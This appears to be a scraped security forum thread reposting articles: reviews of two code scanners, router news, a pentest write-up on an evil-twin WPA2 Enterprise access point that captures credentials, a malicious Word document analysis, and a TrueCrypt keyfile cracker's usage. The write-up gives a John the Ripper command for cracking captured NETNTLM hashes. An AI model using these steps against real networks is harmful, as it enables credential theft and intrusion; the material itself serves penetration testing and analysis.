  20. YASCA (Yet Another Source Code Analyzer) analyzes Java, and C/C++ primarily, with other languages and JavaScript for security flaws and other bugs. Its’ creator, Michael Scovetta, aggregated many other popular static analysis tools and made it easy-to-integrate with a variety of other tools, including others on this list: FindBugs, CppCheck, and more. The tool was created in 2008 to help developers in looking for security bugs by automating part of their code review and finding the “low hanging fruit.” For more info on Yasca, check out this presentation that the creator, Michael Scovetta gave at the NY PHP Conference in ’09. The latest version, 3.0.4, was released in 2012. See the GitHub repository here. The Good: The fact that YASCA is an aggregated tool from other powerful tools, it took the best parts of each and combined for broader coverage The Not-As-Good: Broader does not mean deeper: Keep in mind that this tool was built to look for low-hanging fruits like SQL injections and XSS, so be wary of missing more serious issues. Sursa: https://github.com/scovetta/yasca
  21. This automated code security tool works with C++, C#, VB, PHP and Java to identify insecurities and other issues in the code. Developed by Nick Dunn (@N1ckDunn), the tool quickly scans and describes – in detail – the issues it finds, offering an easy-to-use interface. The Good: Allows for custom configurations for your own queries Tells you the security level of the vulnerabilities it finds Searches intelligently for specific violations of OWASP recommendations Consistently updated since its creation in 2012 The Not-As-Good: While it can analyze many languages, you have to tell it the language you’re scanning Scans for a set list of vulnerabilities that cannot be modified Isn’t fully automated Sursa: SourceForge.net: VisualCodeGrepper V2.0.0 - Project Web Hosting - Open Source Software
  22. [h=1]D-Link's new routers look crazy, but they're seriously fast[/h] by Steve Dent | @stevetdent | January 5th 2015 at 4:57 am D-Link has just jumped the router shark with its latest AC5300, AC3200 and AC3100 Ultra Performance models. On top of speeds up to 5.3Gbps for the AC5300 model, the 802.11ac devices feature, um, striking looks that hopefully won't frighten small children or animals. D-Link calls the models "attractive" with a "modern form-factor for today's homes," and we'd agree -- provided you live in some kind of rouge-accented spaceship. Performance-wise, however, the new models are definitely drool-worthy, thanks to 802.11ac tri-band beamforming speeds between 3.1- and 5.3Gbps, along with gigabit ethernet, high power antennas and onboard USB 3.0 ports. You can control the devices with a smartphone or tablet, and D-Link also outed an optional DWA-192 USB 3.0 adapter, which connects to laptops and PCs to give them an 802.11ac connection. The AC3200 model will run $310 and is available now from NewEgg, while the rest of the pricing and models will come next quarter. On top of the wireless stuff, D-Link also announced new PowerLine HomePlug kits, with speeds up to 2Gbps. The company says the DHP-701AV (2Gbps) and DHP-601AV (1Gbps) adapters use the fastest two wires in a typical three-wire power installation with pushbutton connection for ease of installation and security. Both kits comes with two adapters and will run $130 (DHP-701AV) and $80 (DHP-601AV), with both arriving later this quarter. Sursa: D-Link's new routers look crazy, but they're seriously fast
  23. [h=3]Professionally Evil: This is NOT the Wireless Access Point You are Looking For[/h] I was recently conducting a wireless penetration test and was somewhat disappointed (but happy for our client) to find that they had a pretty well configured set of wireless networks. They were using WPA2 Enterprise and no real weaknesses that I could find in their setup. After conducting quite a bit of analysis on network captures and looking for any other source of weakness, I finally concluded that I wasn't going to get anywhere with the approaches I was taking. Rather than giving up and leaving it at that, I decided to go after the clients using the network and see what I could get them to do. I had a a laptop and a number of iOS, Android and Palm devices at my disposal, so how would they respond to a fake access point? I decided to setup a fake access point (AP) using a matching SSID, which we will call "FOOBAR" for our purposes. I downloaded the latest version of hostapd (2.0 as of this post) and set it up to be use WPA2 Enterprise and configured Freeradius-WPE as the fake authentication system. The goal was to have a client connect to my evil AP and then give me their credentials. Freeradius-WPE came pre-installed on my laptop running Backtrack, so no real work there. About all I did was install a valid SSL certificate for use by the radius daemon. Unfortunately, I could never get Freeradius-WPE to handle the CA certificate chain correctly and that had an impact on my attack later on. If you don't care about a valid TLS certificate, then start Freeradius-WPE on Backtrack by running "radius -X". The -X will cause the daemon to setup self signed TLS certificates automatically. With that done, I moved on to installing hostapd. At first I installed hostapd from the apt repositories already setup in Backtrack. Unfortunately, there was an issue with that version and my setup, which caused it to fail at startup. To get around this, I downloaded and installed the app from source and the problem went away. Below is my hostapd.conf file. This config is largely based off of some searches for default configurations of hostapd and then I researched the settings that I needed to have to get WPA2 Enterprise working. The critical pieces to doing that were setting wpa=1 and then setting wpa_key_mgmt=WPA-EAP. I also made sure that hostapd was pointed to my radius server and had the correct password to access it. Last, I set my SSID to match our client's environment (or in in this example used "FooBar"). To get hostapd running, I ran "hostapd hostapd.conf" and I was up and running. I picked up my test iPhone and found FooBar in my list of available networks. When I selected this network, I was prompted for my test account's username and password. So far so good... Then I hit a major snag in making this attack invisible. The SSL certificate chain was not being presented properly, so my cert showed up as invalid. After a bit of troubleshooting and a dwindling testing window for this attack, I finally had to relegate fixing this to later research. And honestly, if someone was presented with an invalid certificate the chances are pretty high I'd get someone to click on it in spite of this warning. I accepted this warning and proceeded on with my test. The credentials were sent to my fake AP and Freeradius-WPE captured my credentials. The password doesn't get sent across, but that's hardly an issue in this case. I'm using a really dumb password for our example and John the Ripper with a good password list will have no issues with it. All we need to do is take the username and hashes and put them into a text file in the format that john expects for NETNTLM hashes. This involves removing all the colons in the hashes and getting them delimited properly for the expected format. My two entries end up looking like this in my capture file. Finally, I turn John loose on the hashes by running "john -w:/pentest/passwords/wordlists/rockyou.txt --format=NETNTLM hashes.txt". As expected, the hashes broke within seconds. At this point the attacker wins by using these credentials to log into the targeted network and proceeds with whatever the next step in their attack is. There were a few steps to get to this point, but really it was pretty straight forward. Happy pen testing! Jason Wood is a Senior Security Consultant with Secure Ideas. If you are in need of a penetration test or other security consulting services you can contact him at jason@secureideas.com or visit the Secure Ideas - Professionally Evil site for services provided. Posted by Jason Wood at 9:18 PM Sursa: Secure Ideas: Professionally Evil!: Professionally Evil: This is NOT the Wireless Access Point You are Looking For
  24. What It Looks Like: Disassembling A Malicious Document I recently analyzed a malicious document, by opening it on a virtual machine; this was intended to simulate a user opening the document, and the purpose was to determine and document artifacts associated with the system being infected. This dynamic analysis was based on the original analysis posted by Ronnie from PhishMe.com, using a copy of the document that Ronnie graciously provided. After I had completed the previous analysis, I wanted to take a closer look at the document itself, so I disassembled the document into it's component parts. After doing so, I looked around on the Internet to see if there was anything available that would let me take this analysis further. While I found tools that would help me with other document formats, I didn't find a great deal that would help me this particular format. As such, I decided to share what I'd done and learned. The first step was to open the file, but not via MS Word...we already know what happens if we do that. Even though the document ends with the ".doc" extension, a quick look at the document with a hex editor shows us that it's format is that of the newer MS Office document format; i.e., compressed XML. As such, the first step is to open the file using a compression utility, such as 7Zip, as illustrated in figure 1. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 1: Document open in 7Zip[/TD] [/TR] [/TABLE] As you can see in figure 1, we now have something of a file system-style listing that will allow us to traverse through the core contents of the document, without actually having to launch the file. The easiest way to do this is to simply extract the contents visible in 7Zip to the file system. Many of the files contained in the exported/extracted document contents are XML files, which can be easily viewed using viewers such as Notepad++. Figure 2 illustrates partial contents for the file "docProps/app.XML". [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 2: XML contents[/TD] [/TR] [/TABLE] Within the "word" folder, we see a number of files including vbaData.xml and vbaProject.bin. If you remember from PhishMe.com blog post about the document, there was mention of the string 'vbaProject.bin', and the Yara rule at the end of the post included a reference to the string “word/_rels/vbaProject.bin”. Within the "word/_rels" folder, there are two files...vbaProject.bin.rels and document.xml.rels...both of which are XML-format files. These documents describe object relationships within the overall document file, and of the two, documents.xml.rels is perhaps the most interesting, as it contains references to image files (specifically, "media/image1.jpg" and "media/image2.jpg"). Locating those images, we can see that they're the actual blurred images that appear in the document, and that there are no other image files within the extracted file system. This supports our finding that clicking the "Enable Content" button in MS Word did nothing to make the blurred documents readable. Opening the word/vbaProject.bin file in a hex editor, we can see from the 'magic number' that the file is a structured storage, or OLE, file format. The 'magic number' is illustrated in figure 3. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 3: vbaProject.bin file header[/TD] [/TR] [/TABLE] Knowing the format of the file, we can use the MiTeC Structured Storage Viewer tool to open this file and view the contents (directories, streams), as illustrated in figure 4. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 4: vbaProject[/TD] [/TR] [/TABLE] Figure 5 illustrates another view of the file contents, providing time stamp information from the "VBA" folder. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 5: Time stamp information[/TD] [/TR] [/TABLE] Remember that the original PhishMe.com write-up regarding the file stated that the document had originally been seen on 11 Dec 2014. This information can be combined with other time stamp information in order to develop an "intel picture" around the infection itself. For example, according to VirusTotal, the malicious .exe file that was downloaded by this document was first seen by VT on 12 Dec 2014. The embedded PE compile time for the file is 19 June 1992. While time stamps embedded within the document itself, as well as the PE compile time for the 'msgss.exe' file may be trivial to modify and obfuscate, looking at the overall wealth of information provides analysts with a much better view of the file and its distribution, than does viewing any single time stamp in isolation. If we continue navigating through the structure of the document, and go to the VBA\ThisDocument stream (seen in figure 4), we will see references to the files (batch file, Visual Basic script, and Powershell script) that were created within the file system on the infected system. Summary My goal in this analysis was to see what else I could learn about this infection by disassembling the malicious document itself. My hope is that the process discussed in this post will serve as an initial roadmap for other analysts, and be extended in the future. Tools Used 7Zip Notepad++ Hex Editor (UltraEdit) MiTeC Structured Storage Viewer Resources Lenny Zeltser's blog - Analyzing Malicious Documents Cheat Sheet Virus Bulletin presentation (from 2009) Kahu Security blog post - Dissecting a Malicious Word document Document-Analyzer.net - upload documents for analysis Posted by Harlan Carvey at 8:37 AM Sursa: Windows Incident Response: What It Looks Like: Disassembling A Malicious Document
  25. TrueCrypt key file cracker. [h=1]Usage[/h] python tckfc.py [-h] [-c [COMBINATION]] keyfiles tcfile password mountpoint keyfiles: Possible key files directory tcfile: TrueCrypt encrypted file password: Password for TrueCrypt file mountpoint: Mount point [h=1]Example[/h] mkdir mnt cp a.pdf keys/ cp b.doc keys/ cp c.txt keys/ cp d.jpg keys/ cp e.gif keys/ python tckfc.py keys/ encrypted.img 123456 mnt/ Sursa: https://github.com/Octosec/tckfc
×
×
  • Create New...